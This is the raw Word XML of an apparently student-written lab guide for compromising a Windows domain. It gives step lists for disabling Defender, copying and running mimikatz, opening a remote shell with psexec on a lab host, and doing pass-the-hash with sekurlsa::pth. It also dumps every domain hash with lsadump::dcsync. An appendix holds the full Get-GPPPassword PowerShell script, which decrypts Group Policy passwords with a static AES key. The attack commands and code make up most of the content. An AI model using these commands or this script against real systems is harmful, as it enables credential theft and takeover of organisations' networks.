    <w:p w14:paraId="06D7E68A" w14:textId="687A45EA" w:rsidR="0079431A" w:rsidRDefault="0079431A" w:rsidP="0079431A">
      <w:r>
        <w:t>Copy mimikatz via xcopy via the net use drive you just made</w:t>
      </w:r>
      <w:r w:rsidR="00DA3694">
        <w:t>. Disable defender before this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A30A89" w14:textId="4163D121" w:rsidR="0079431A" w:rsidRDefault="0079431A" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>copy c:\&lt;path&gt;\mimikatz_trunk</w:t>
      </w:r>
      <w:r>
        <w:t>\x64\mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> x:\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B091760" w14:textId="77777777" w:rsidR="00085718" w:rsidRDefault="00085718" w:rsidP="00807650">
      <w:r>
        <w:t>Reverse shell door psexec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2231E" w14:textId="77777777" w:rsidR="00085718" w:rsidRDefault="00085718" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open een administrator command prompt waarmee je ook die remote C drive kon connecten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA5728" w14:textId="511719AE" w:rsidR="00311503" w:rsidRDefault="00085718" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Psexec.exe /accepteula </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00382C1A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\192.168.56.110</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E410E43" w14:textId="24CE62EB" w:rsidR="00CD053B" w:rsidRDefault="00CD053B" w:rsidP="00CD053B">
      <w:r>
        <w:t>Spawn window with domain admin creds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5A36C" w14:textId="608B8F35" w:rsidR="00CD053B" w:rsidRDefault="00CD053B" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6501E0A2" w14:textId="1E006868" w:rsidR="00CD053B" w:rsidRDefault="00CD053B" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sekurlsa::pth /user:&lt;admin user&gt; /domain:&lt;domein&gt; /NTLM:&lt;ntlm&gt; /run cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B20DE3" w14:textId="243473CD" w:rsidR="00CD053B" w:rsidRDefault="00CD053B" w:rsidP="00CD053B">
      <w:r>
        <w:t>Get everything LSAdump from domain</w:t>
      </w:r>
      <w:r w:rsidR="00DD72DA">
        <w:t xml:space="preserve"> which gives all the hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B40F7" w14:textId="39E74787" w:rsidR="00DD72DA" w:rsidRDefault="00DD72DA" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AFE294" w14:textId="23E8AB22" w:rsidR="00DD72DA" w:rsidRDefault="00DD72DA" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9EE6D" w14:textId="6ECAF473" w:rsidR="00DD72DA" w:rsidRDefault="00DD72DA" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lsadump::dcsync /domain:&lt;domein + extension .local&gt; /all /csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43139EEF" w14:textId="61880E7F" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408"/>
    <w:p w14:paraId="3BA11785" w14:textId="2E102D0C" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408"/>
    <w:p w14:paraId="3D9CF622" w14:textId="2BF6ABC6" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00156BA2">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31289376" w14:textId="5D9D687A" w:rsidR="00156BA2" w:rsidRPr="00156BA2" w:rsidRDefault="00156BA2" w:rsidP="00156BA2">
      <w:r>
        <w:t>The following steps should be followed for getting domain access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CE5085" w14:textId="4AEBC977" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make your own admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CAE99" w14:textId="2AD2BA05" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable defender so you can use mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137091C" w14:textId="14D0BD5C" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run mimikatz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD1D5C" w14:textId="7C33344F" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Builtin password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC0962" w14:textId="2B177B76" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap to find pc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536AABC4" w14:textId="29BBABD6" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect to next pc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DA2C0" w14:textId="55D23978" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable defender so you can use mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3A2DB" w14:textId="3E72B1AD" w:rsidR="00F97408" w:rsidRDefault="00F97408" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run mimikatz to find NTLM hash sekurlsa</w:t>
      </w:r>
      <w:r w:rsidR="00CD053B">
        <w:t xml:space="preserve"> and copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CB0B1" w14:textId="57687BF0" w:rsidR="00CD053B" w:rsidRDefault="00592734" w:rsidP="00F97408">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disconnect from pc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E8B5D8" w14:textId="2DCC77A8" w:rsidR="00592734" w:rsidRDefault="00592734" w:rsidP="00592734">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open mimikatz and spawn window with domain creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFF02D" w14:textId="03A6C58F" w:rsidR="004B2A74" w:rsidRDefault="00592734" w:rsidP="001F0196">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lsa::dump domain creds</w:t>
      </w:r>
      <w:r w:rsidR="004B2A74">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58269587" w14:textId="05E6DD2E" w:rsidR="003D2636" w:rsidRDefault="00DC5071" w:rsidP="00DC5071">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bijlage 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518FD0C2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&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15488CF4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function Get-GPPPassword {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B542464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14:paraId="0604C934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&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A77E33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.Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A127BF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14:paraId="257E8D3A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Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCA9F3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Author: Chris Campbell (@obscuresec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32109021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License: GNU GPL v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407610B4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.Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B9FE6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14:paraId="17E1F5E7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Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A34D00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14:paraId="5DCDC7AC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.Parameter Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72070C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14:paraId="438530F9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The path to the targeted groups.xml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4A396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14:paraId="17F4973F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.Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B18FE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14:paraId="4ADA783A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Get-GPPPassword -path c:\demo\groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A432C80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14:paraId="3E0F05C3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.Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CECD2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14:paraId="44F60C1B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http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B3D27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http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5D6BD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#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422BD4C5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14:paraId="268E67AE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Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C3715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14:paraId="7B49F54B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#Function to pull encrypted password string from groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F544830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function Parse-cPassword {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6242B6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A621D3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    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C7018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        [xml] $Xml = Get-Content ($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A153DC3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        [String] $Cpassword = $Xml.Groups.User.Properties.cpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF0AD3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    } catch { Write-Error "No Password Policy Found in File!" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F2834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     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45362DEE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    return $Cpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8CD189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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F58F4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14367F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#Function to look to see if the administrator account is given a newname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B8645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function Parse-NewName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DAE0A2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E858FA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    [xml] $Xml = Get-Content ($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA5C84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    [String] $NewName = $Xml.Groups.User.Properties.newName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC0ACB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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26FB96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    return $NewName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8EB4A2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB49088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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0619778B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    #Function to parse out the Username whose password is being specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0BC393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function Parse-UserName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A9B18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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFCC681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    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02581417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        [xml] $Xml = Get-Content ($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080765F0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        [string] $UserName = $Xml.Groups.User.Properties.userName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE68C8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    } catch { Write-Error "No Username Specified in File!" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55667ACA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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5781868A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    return $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F13348D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED3C596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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FE674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#Function that decodes and decrypts password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D48DD9C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function Decrypt-Password {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A91F9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466ED14D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    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24605AA1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        #Append appropriate padding based on string length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F819C4C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        $Pad = "=" * (4 - ($Cpassword.length % 4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A55BFDD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        $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE5A39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        #Create a new AES .NET Crypto Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C82DD8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        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93C250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        #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329240DE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        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF5B44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                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED18A5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        #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D73CB8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        $AesIV = New-Object Byte[]($AesObject.IV.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76414352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        $AesObject.IV = $AesIV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C090E2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        $AesObject.Key = $AesKey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682FDC0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        $DecryptorObject = $AesObject.CreateDecryptor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4D8BCF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        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF974F7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        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C090FBB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        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD5744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    } catch { Write-Error "Decryption Failed!" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9BFD8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4189C6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F55A1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14:paraId="4595067C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$Cpassword = Parse-cPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126ACC6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$Password = Decrypt-Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BEE6B8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$NewName = Parse-NewName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA602EE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$UserName = Parse-UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB1A7C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3DF76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$Results = New-Object System.Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B609897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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CADA41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Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4823E420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Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F38AD9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   Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51227DE6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14:paraId="3344BCF1" w14:textId="77777777" w:rsidR="00DC5071" w:rsidRPr="00DC5071" w:rsidRDefault="00DC5071" w:rsidP="00DC50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C507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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return $Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CBF85" w14:textId="77777777" w:rsidR="00DC5071" w:rsidRPr="00DC5071" w:rsidRDefault="00DC5071" w:rsidP="00DC5071"/>
    <w:sectPr w:rsidR="00DC5071" w:rsidRPr="00DC5071" w:rsidSect="0074187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B47BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB84A7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33C6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D82006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24D57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72D617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D1F4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C9C3B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8108B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F10D9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37543"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1C8F2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14FB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00BA4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D3361"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B686A6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358F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B90CD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768D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E1E78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30590"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB84A7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F2B72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F000E5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4164F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF948E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7920C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB84A7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27D3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8862AD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10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14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EA"/>
    <w:rsid w:val="00005CCB"/>
    <w:rsid w:val="00022ECA"/>
    <w:rsid w:val="00036FA1"/>
    <w:rsid w:val="000638B6"/>
    <w:rsid w:val="00085718"/>
    <w:rsid w:val="000E1265"/>
    <w:rsid w:val="000E2FA2"/>
    <w:rsid w:val="001111D9"/>
    <w:rsid w:val="00116E0C"/>
    <w:rsid w:val="00135735"/>
    <w:rsid w:val="00156BA2"/>
    <w:rsid w:val="001914E3"/>
    <w:rsid w:val="001974D1"/>
    <w:rsid w:val="001F0196"/>
    <w:rsid w:val="0021065A"/>
    <w:rsid w:val="00296F8C"/>
    <w:rsid w:val="002B05C9"/>
    <w:rsid w:val="002C7328"/>
    <w:rsid w:val="002D487A"/>
    <w:rsid w:val="002D7CB2"/>
    <w:rsid w:val="002E6755"/>
    <w:rsid w:val="002F3952"/>
    <w:rsid w:val="00311503"/>
    <w:rsid w:val="00315E9B"/>
    <w:rsid w:val="00382A8F"/>
    <w:rsid w:val="003A10BD"/>
    <w:rsid w:val="003B0434"/>
    <w:rsid w:val="003B06D2"/>
    <w:rsid w:val="003C5563"/>
    <w:rsid w:val="003D2636"/>
    <w:rsid w:val="003D31C6"/>
    <w:rsid w:val="003D3F0B"/>
    <w:rsid w:val="003D62BC"/>
    <w:rsid w:val="003F6DFF"/>
    <w:rsid w:val="004053A9"/>
    <w:rsid w:val="00461F85"/>
    <w:rsid w:val="00486C20"/>
    <w:rsid w:val="004947A4"/>
    <w:rsid w:val="0049766C"/>
    <w:rsid w:val="004A5989"/>
    <w:rsid w:val="004B2A74"/>
    <w:rsid w:val="004B7420"/>
    <w:rsid w:val="00527D90"/>
    <w:rsid w:val="005361B6"/>
    <w:rsid w:val="005524F4"/>
    <w:rsid w:val="00564596"/>
    <w:rsid w:val="00592734"/>
    <w:rsid w:val="006220C3"/>
    <w:rsid w:val="00627E30"/>
    <w:rsid w:val="00634D43"/>
    <w:rsid w:val="00675DF6"/>
    <w:rsid w:val="006860CD"/>
    <w:rsid w:val="006D329B"/>
    <w:rsid w:val="006D72CF"/>
    <w:rsid w:val="006E7324"/>
    <w:rsid w:val="00715EC8"/>
    <w:rsid w:val="0074187D"/>
    <w:rsid w:val="0074562C"/>
    <w:rsid w:val="00776453"/>
    <w:rsid w:val="007772A6"/>
    <w:rsid w:val="0079431A"/>
    <w:rsid w:val="00807650"/>
    <w:rsid w:val="0083360C"/>
    <w:rsid w:val="00847531"/>
    <w:rsid w:val="00890208"/>
    <w:rsid w:val="00893F5B"/>
    <w:rsid w:val="008C5468"/>
    <w:rsid w:val="00911C57"/>
    <w:rsid w:val="0095610D"/>
    <w:rsid w:val="009F3F4F"/>
    <w:rsid w:val="00A13CB1"/>
    <w:rsid w:val="00A32321"/>
    <w:rsid w:val="00A81AB9"/>
    <w:rsid w:val="00B00B3D"/>
    <w:rsid w:val="00B13ABD"/>
    <w:rsid w:val="00B3482A"/>
    <w:rsid w:val="00B747D0"/>
    <w:rsid w:val="00B965F9"/>
    <w:rsid w:val="00BB1F5C"/>
    <w:rsid w:val="00C8178C"/>
    <w:rsid w:val="00CA70EF"/>
    <w:rsid w:val="00CD053B"/>
    <w:rsid w:val="00D111AD"/>
    <w:rsid w:val="00D4421D"/>
    <w:rsid w:val="00D640E2"/>
    <w:rsid w:val="00D95F08"/>
    <w:rsid w:val="00DA3694"/>
    <w:rsid w:val="00DC5071"/>
    <w:rsid w:val="00DD72DA"/>
    <w:rsid w:val="00E40517"/>
    <w:rsid w:val="00E507CE"/>
    <w:rsid w:val="00E80D24"/>
    <w:rsid w:val="00ED7F50"/>
    <w:rsid w:val="00F03065"/>
    <w:rsid w:val="00F34D9D"/>
    <w:rsid w:val="00F43E1C"/>
    <w:rsid w:val="00F91CEA"/>
    <w:rsid w:val="00F97408"/>
    <w:rsid w:val="00FA6659"/>
    <w:rsid w:val="00FC7F7B"/>
    <w:rsid w:val="00FD33EF"/>
    <w:rsid w:val="00FE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9FE9CA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CEE709EA-A9A8-4E0E-9F5A-DE478054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638B6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4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638B6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638B6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638B6"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="44"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lijstalinea">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Standaard"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B747D0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0638B6"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:sz w:val="24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497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49766C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4976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F34D9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34D9D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="Standaardalinea-lettertype"/>
    <w:rsid w:val="00DC50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Kop2Char">
    <w:name w:val="Kop 2 Char"/>
    <w:basedOn w:val="Standaardalinea-lettertype"/>
    <w:link w:val="Kop2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000638B6"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi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6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bscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell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domain\SYSVOL\domain\policies\-\machine\groups.x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etomsi.com/freewar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t2exe.net/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\192.168.56.1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entilkiwi/mimikatz/releases/tag/2.2.0-20200918-fi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7</Pages>
  <Words>1315</Words>
  <Characters>7233</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>60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Gogh, S. van (18093779)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Gogh, S. van (18093779)</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-05T12:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-09T13:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>